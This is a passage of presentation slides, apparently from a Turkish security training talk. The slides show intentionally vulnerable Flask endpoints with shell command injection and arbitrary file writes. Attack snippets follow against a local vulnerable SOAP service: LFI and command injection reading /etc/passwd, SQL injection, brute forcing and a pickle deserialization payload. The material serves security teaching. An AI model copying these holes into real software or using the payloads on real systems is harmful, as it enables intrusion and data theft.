  • 59. OWASP – VULNERABLE FLASK APP @app.route("/run_file") def run_file(): try: filename=request.args.get("filename") command="/bin/bash "+filename data=subprocess.check_output(command,shell=True) return data except: return jsonify(data="File failed to run"), 200
  • 60. OWASP – VULNERABLE FLASK APP @app.route("/create_file") def create_file(): try: filename=request.args.get("filename") text=request.args.get("text") file=open(filename,"w") file.write(text) file.close() return jsonify(data="File created"), 200 except: return jsonify(data="File didn't create"), 200
  • 61. OWASP – VULNERABLE FLASK APP
  • 62. VULNERABLE SOAP SERVICE https://github.com/anil-yelken/Vulnerable-Soap-Service -LFI -SQL Injection -Information Disclosure -Command Injection -Brute Force -Deserialization
  • 63. VULNERABLE SOAP SERVICE LFI from suds.client import Client client = Client('http://127.0.0.1:8000/?wsdl') print(client) print(client.service.read_file("/etc/passwd"))
  • 64. VULNERABLE SOAP SERVICE SQL INJECTION from suds.client import Client client = Client('http://127.0.0.1:8000/?wsdl') print(client) print(client.service.query("' or '1=1"))
  • 65. VULNERABLE SOAP SERVICE INFORMATION DISCLOSURE from suds.client import Client client = Client('http://127.0.0.1:8000/?wsdl') print(client) print(client.service.get_log())
  • 66. VULNERABLE SOAP SERVICE COMMAND INJECTION from suds.client import Client client = Client('http://127.0.0.1:8000/?wsdl') print(client) print(client.service.get_users("kali /etc/passwd ; id n# "
  • 67. VULNERABLE SOAP SERVICE BRUTE FORCE from suds.client import Client client = Client('http://127.0.0.1:8000/?wsdl') print(client) username_list=["admin","test","siber","siber1"] for username in username_list: print(client.service.query(username))
  • 68. VULNERABLE SOAP SERVICE DESERIALIZATION import socket,pickle,builtins HOST = "127.0.0.1" PORT = 8001 class Pickle(object): def __reduce__(self): return (builtins.exec, ("with open('/etc/passwd','r') as files: print(files.readlines())",)) with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock: sock.connect((HOST,PORT)) sock.sendall(pickle.dumps(Pickle())) from suds.client import Client client = Client('http://127.0.0.1:8000/?wsdl') print(client) print(client.service.deserialization())
  • 69. ŞIRKET SOSYAL MEDYA HESAPLARI • https://kaleileriteknoloji.medium.com/ https://www.linkedin.com/company/54162391 https://twitter.com/kaleileri https://twitter.com/kaleakademi https://www.instagram.com/kaleileri/ https://www.instagram.com/kalesiberakademi https://github.com/kaleakademi https://www.youtube.com/results?search_query=kale+ileri+teknoloji+
  • 70. KIŞISEL SOSYAL MEDYA HESAPLARIM • https://www.linkedin.com/in/ayelk/ • https://twitter.com/anilyelken06 • https://medium.com/@anilyelken • https://github.com/anil-yelken